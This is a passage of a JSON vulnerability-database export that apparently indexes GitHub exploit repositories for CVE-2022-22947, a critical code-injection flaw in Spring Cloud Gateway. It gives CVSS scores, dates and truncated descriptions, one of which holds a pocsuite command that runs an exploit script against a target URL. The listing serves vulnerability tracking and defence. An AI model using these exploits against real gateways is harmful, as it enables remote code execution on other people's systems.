{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T09:47:55", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-07T16:39:03", "id": "5CD875BA-A337-5F27-A564-14CED5C59575", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-06T05:23:52", "description": "# CVE-2022-22947\nCVE-2022-22947_...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-08T09:32:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-07-06T04:52:18", "id": "260A09F0-4562-5ECD-A0DE-5055D7DC07E8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T23:34:16", "description": "# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)\r\n#...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T18:26:18", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-10T17:22:39", "id": "4E9E5EA5-ED60-5372-A45E-E4EB3EACD761", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T17:32:04", "description": "# cve-2022-22947\np...", "cvss3": {}, "published": "2022-03-03T09:24:36", "type": "githubexploit", "title": "Exploit for CVE-2022-22947", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-03T15:07:55", "id": "B0B4203D-0831-5405-9970-9B8EEE171BE6", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-05-07T18:06:29", "description": "# Burp_VulPscan\n~~burp\u88ab\u52a8\u626b\u63cf\u63d2\u4ef6\uff0c\u76ee...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-11T06:19:24", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-22T01:36:40", "id": "13B098A9-7171-5D73-BDE6-148CAB4F8F28", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-21T10:09:57", "description": "# CVE-2022-22947\nSpring Cloud Gateway Actuator API SpEL\u8868\u8fbe\u5f0f\u6ce8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-16T15:27:41", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-21T07:25:33", "id": "1C1E0F3C-2472-5BC6-A967-B71B63F51BE9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-22T16:21:57", "description": "# CVE-2022-22947\n\n> `Spring Cloud Gateway`\u662f`Spring\u4e2d`\u7684\u4e00\u4e2a`API`\u7f51\u5173\u3002\u5176...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T02:27:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-22T07:16:19", "id": "FD75018B-E9E5-5053-8E81-F0E287C5C60F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-09T10:39:53", "description": "## \u6f0f\u6d1e\u7b80\u4ecb\r\nSpring Cloud Gateway \u662f Spring Cloud \u7684\u4e00\u4e2a\u5168\u65b0\u9879\u76ee\uff0c\u8be5\u9879\u76ee\u662f\u57fa\u4e8e Spri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-21T23:37:20", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-09T06:00:29", "id": "ED9D4BD6-7385-5547-B924-5FFC865CFA69", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-17T01:21:48", "description": "# CVE-2022-22947\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T18:37:57", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-16T23:01:27", "id": "D8833A47-C03D-5D09-A449-DF19AB0A9258", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-31T01:07:10", "description": "# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)\r\n#...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T16:08:23", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-30T18:10:10", "id": "A73A6F1F-C457-59E2-8BDC-BDC9A5EEC2FB", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-06T08:26:06", "description": "# CVE-2022-22947 godzilla-me...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-26T05:48:27", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-07-06T07:48:15", "id": "5311844C-6D6C-5939-8B20-911F0C6E1486", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T05:47:03", "description": "# CVE-2022-22947\nSpring Cloud Gateway Actuator API SpEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u547d\u4ee4\u6267\u884c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T02:29:02", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-29T23:43:36", "id": "F6DAC821-341C-5097-BC37-E8180E188563", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-18T08:12:24", "description": "# CVE-2022-22947\npoc:\npocsuite -r CVE-2022-22947_POC_EXP.py -u u...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-17T09:12:51", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-18T04:00:45", "id": "372EBCFC-580D-50E0-8CB9-D107EF1C938C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T05:16:48", "description": "# Spring-Cloud-Gateway-CVE-2022-22947\n\n\nSpring Cloud Gateway\u8fdc\u7a0b\u4ee3\u7801...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-02T11:58:55", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-22T05:16:43", "id": "73395497-EF2F-5E2B-B145-700BEECCF730", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-17T20:33:15", "description": "# Spring-Cloud-Gateway(CVE-2022-22947)\nSpring C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T02:36:02", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-04T02:46:40", "id": "EE6F9847-0C12-588E-BA63-6DD573963EFC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-17T20:32:55", "description": "# \u6f0f\u6d1e\u63cf\u8ff0\nSpring Cloud GateWay\u662fSpring Cloud\u7684\u2f00\u4e2a\u5168\u65b0\u9879\u2f6c\uff0c\u2f6c\u6807\u662f\u53d6\u4ee3Netflix Zuu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-05T06:19:46", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-07T06:26:50", "id": "EF9B393E-84B6-5A0D-B8D2-6759E5970758", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-20T15:04:35", "description": "# CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE\n## CVE-2022-22947\u7b80...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T07:24:13", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-20T10:11:30", "id": "453E372C-9914-57AC-8703-E5C770B9BA54", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-17T20:32:39", "description": "# Spring Cloud Gateway Actuator API SpEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u547d\u4ee4\u6267\u884c\uff08CVE-2022-22947...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T16:24:42", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-08T13:21:36", "id": "5B69D6E3-B8F0-5B31-85EA-FB6183EF2F63", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-17T20:34:13", "description": "# CVE-2022-22947\n\n## Poc for CVE-2022-22947\n\n### Dn...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T10:10:12", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-04T13:51:52", "id": "9ABC13CF-FB35-5B18-B3C4-C40087AA9CA9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T19:58:51", "description": "# SpEL\nSpring Cloud Gateway Actuator API SpEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u547d\u4ee4\u6267\u884c\uff08CVE-2022-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T09:14:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 